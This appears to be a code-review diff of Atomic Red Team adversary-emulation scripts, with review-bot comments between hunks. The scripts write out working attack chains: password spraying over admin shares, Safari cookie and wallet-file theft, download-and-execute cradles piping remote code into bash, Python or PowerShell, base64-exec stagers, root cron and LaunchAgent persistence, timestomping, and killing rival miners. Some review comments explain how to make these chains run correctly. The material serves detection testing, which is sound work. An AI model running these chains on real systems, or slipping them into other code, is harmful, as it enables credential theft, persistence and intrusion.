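Review bot: the shebang is `#!/bin/sh`, but `if [[ "$MACCHECK" == "Mac" ]]` and `if [ "$PLAT" == "Mac" ]` are bash-isms; under dash `[[` is a syntax error and `==` inside `[` is not portable. Either use `#!/bin/bash` or write `[ "$x" = "Mac" ]` throughout, the form already used at `if [ "$PLAT" = "Mac" ]`. `sw_vers` does not exist on Linux, so the platform probe prints an error there before falling through to `PLAT="Linux"`; `sudo -l -n` and `cat /etc/sudoers` need privileges the script never checks for. Comment typos: `reconnaisance`, `Tacttic`, `Compresssed`.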
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
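Review bot: the `Multiple Endpoints` loop `@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc")` is missing the closing `'` before `)`, so the command string is unterminated and cmd.exe rejects the line; compare the commented single-endpoint form above it. The spray `net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p` tries every entry in `passwords.txt` against every user with no delay and will trip a normal lockout policy; that risk belongs in the header. `copy %%f c:\temp\` assumes `c:\temp` exists; add `mkdir c:\temp` first.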
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
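Review bot: `ProgramArguments` invokes bare `python`, so the agent depends on an interpreter being on launchd's default `PATH`; use an absolute path, and note that the decoded stage in the accompanying Python file relies on `urllib2`, which is Python 2 only. The `Label` value `cookie-miner-backdoor-launchagent.plist` carries a `.plist` suffix while stage 01 installs the file as `com.proxy.initialize.plist`; label and filename conventionally match (reverse-DNS, no extension), and the mismatch is itself a detection artefact worth calling out in a comment.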
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
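Review bot: `curl --silent .../cookie-miner-stage-02.py || wget -q -O- .../cookie-miner-stage-02.py | python - ``` parses as `curl ... || (wget ... | python -)`, so whenever curl succeeds the stage-02 source is written to stdout and never executed, and the trailing ``` `` ``` is a stray empty command substitution; wrap the fetch as the Rocke stage does: `(curl ... || wget ...) | python -`. `grep -q "coinbase" "Cookies.binarycookies"` sets an exit status nothing reads. `interestingfiles.txt` is copied into `${OUTPUT}` after `zip -r interestingsafaricookies.zip ${OUTPUT}` has already run, so it never lands in the archive; move the `find` above the `zip`. The agent filename `com.apple.rig2.plist` deliberately squats on Apple's namespace, which is the detection point and deserves a comment.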
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'))
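Review bot: the decoded body shown commented out above the `exec` uses `urllib2` and does `re.search("Little Snitch", out)` on `ps.stdout.read()`; that is Python 2 only, and under Python 3 `out` is `bytes`, so the `re.search` raises `TypeError` before the beacon to `http://atomicredteam.io/news.php` is ever sent. State the Python 2 requirement in the header or port to `urllib.request` and `subprocess.check_output(...).decode()`. Keep the commented plaintext and the base64 argument to `exec` in lockstep; a reviewer has no other way to see what the encoded stage does.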
+17
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
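Review bot: `MIRAI_EXT=`uname -m`` only decorates the filename `mirai.$MIRAI_EXT`; the same `atomic-hello` binary is fetched whatever the architecture, so on anything other than the platform it was built for `./mirai.$MIRAI_EXT` dies with an exec-format error. State the supported architecture in the header or select a per-arch artefact. The `cd /tmp || cd /var/run || cd /mnt || cd /root || cd /` preamble is faithful to Mirai and a good telemetry trigger, but the script never checks that it ended up somewhere writable before `wget -O`.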
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncommend the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
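Review bot: typo in the comment on the fifth line, `uncommend` should be `uncomment`. More substantively, the `curl ... || wget ...` fallback only covers the fetch: whatever comes back is piped straight through `base64 -d | /bin/bash`, and a truncated or empty response that still decodes as base64 will be executed (or silently do nothing) with no error, because the pipeline's status is that of `/bin/bash`. Consider `set -o pipefail`, or decode to a temporary file and check it is non-empty before running it. Finally, the `Executed Atomic Red Team Rocke and Roll, Stage 01` marker is only written after the whole stage-02 script has run inside that pipeline, so if stage 02 fails or hangs the stage-01 marker never appears in /tmp/atomic.log; write the marker before the pipeline, or log the pipeline's exit status with it, so the log timeline lines up with what detection tooling records.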
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
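Review bot: this blob is the base64 encoding of the decoded script in the next hunk (the first line `IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgew` decodes to `#! /bin/bash`, a blank line and `function c() {`, and the final `YQpiCmM=` to `a`, `b`, `c`), presumably the rocke-and-roll-stage-02-base64.sh that stage 01 fetches. Committing the same content twice means the two copies can drift silently; add a validation step that decodes this file and diffs it against the decoded one (`base64 -d rocke-and-roll-stage-02-base64.sh | diff - rocke-and-roll-stage-02-decoded.sh`), or generate one from the other at commit time. Note also that the encoded copy mixes indentation styles in `function a()` (`CgljaGF0` decodes to a newline, a tab and `chat`, while the comment lines are space-indented), so normalise whitespace before encoding if the two files are expected to be byte-identical after a decode.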
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
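Review bot: the call order at the bottom (`a`, `b`, `c`) makes `c` undo part of `b`: `b` drops and backgrounds `nohup /var/tmp/kworkerds`, and `c` then runs `chattr -i /tmp/kworkerds /var/tmp/kworkerds` and `rm -rf /tmp/kworkerds /var/tmp/kworkerds`, so the on-disk artifact is deleted while the process keeps running from the unlinked file. If killing competing miners is meant to happen before the drop, the order should be `c; a; b`; if the deletion is intentional, say so in a comment, because as written a detection test for T1036 removes its own evidence. Second, there is no teardown: `a` writes `/etc/cron.d/root`, `/var/spool/cron/crontabs/root` and `/etc/cron.daily/oanacroner`, each of which re-fetches and re-executes this script (every 10 minutes, every 31 minutes and daily), then timestomps them with `touch -acmr /bin/sh`, and nothing in the file or the change set removes them. Add a cleanup function (remove the three cron files, kill and remove `/var/tmp/kworkerds`) or document prominently that running this test leaves self-renewing persistence on the host. Third, the kill loop in `c` is wider than the comment suggests: `grep "\[.*\]"` with only `kthreadd` excluded sends `kill -9` to every bracketed entry in `ps auxf` output (a no-op for kernel threads, but it will kill any user process whose command line contains square brackets), and the `grep "xmr"` line already matches the `xmrig` line, so one of the two is redundant. Minor: `/var/spool/cron/root` is made mutable by `chattr -i` but never written.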
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
